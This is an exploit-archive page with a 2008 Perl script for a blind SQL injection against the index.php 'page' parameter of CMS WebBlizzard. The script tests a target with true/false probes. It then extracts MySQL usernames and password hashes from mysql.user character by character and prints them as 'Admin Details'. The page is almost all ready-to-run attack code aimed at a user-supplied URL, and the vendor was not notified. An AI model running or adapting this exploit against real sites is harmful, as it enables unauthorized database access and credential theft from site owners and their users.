[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CMS WebBlizzard (index.php page) Blind SQL Injection Exploit
# Published : 2008-07-03
# Author : Bl@ckbe@rD
# Previous Title : Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
# Next Title : phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
#/usr/bin/perl
#|+| Vendor Not Notified
#|+| Author: Bl@ckbe@rD
#|+| Discovered On: 10 june 2008
#|+| greetz: InjEctOrs , underz0ne crew
#--//-->
# -- CMS webBlizzard Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;
print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-n";
print "- -n";
print "- -n";
print "- -n";
print "- CMS WebBlizzard Blind SQL Injection exploit -n";
print "- -n";
print "- -n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-n";
print "nEnter URL (ie: http://site.com): ";
chomp(my $url=<STDIN>);
if(inject_test($url)) {
print "Injecting.. Please Wait this could take several minutes..nn";
my $details = blind($url);
print "Exploit Success! Admin Details: ".$details;
exit;
}
sub blind {
my $url = shift;
my $res = undef;
my $chr = 48;
my $substr = 1;
my $done = 1;
while($done) {
my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM
mysql.user),".$substr.",1))=".$chr."/*");
if($content =~ /Previous/ && $chr == 94) { $done = 0; }
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
return $res;
}
sub inject_test {
my $url = shift;
my $true = get($url."/index.php?page=6) and 1=1 /*");
my $false = get($url."/index.php?page=6) and 1=2 /*");
if($true =~ /Previous/ && $false !~ /Previous/) {
print "nTarget Site Vulnerable!nn";
return 1;
} else { print "nTarget Site Not Vulnerable! Exiting..n"; exit; }
}
# www.Syue.com [2008-07-03]